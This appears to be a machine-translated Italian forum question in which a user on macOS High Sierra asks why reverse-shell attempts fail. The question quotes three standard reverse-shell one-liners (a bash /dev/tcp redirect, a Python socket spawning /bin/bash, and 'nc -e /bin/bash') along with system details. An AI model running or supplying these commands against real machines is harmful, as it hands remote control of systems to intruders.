Sto provando per creare un listener di shell inversa usando High Sierra ma niente sembra funzionare.
Il comando bash si blocca semplicemente nel terminale e va in timeout.
bash -i >& /dev/tcp/0.0.0.0/8080 0>&1
Gli errori del comando python con "Connessione rifiutata" quando si utilizza python o python v2.7.
python -c 'import
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("0.0.0.0",8080));os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
gli errori di comando netcat con "nc: opzione non valida -e"
nc -e /bin/bash 0.0.0.0 8080
Ho provato altre soluzioni che ho trovato online ma ti viene l'idea ...
È possibile creare una shell inversa (preferibilmente con accesso a bash) usando High Sierra?
specifiche:
sh-3.2# system_profiler SPSoftwareDataType
Software:
System Software Overview:
System Version: macOS 10.13.4 (17E199)
Kernel Version: Darwin 17.5.0
Boot Volume: lily
Boot Mode: Normal
Computer Name: lily’s MacBook Air
User Name: System Administrator (root)
Secure Virtual Memory: Enabled
System Integrity Protection: Enabled
Time since boot: 2:03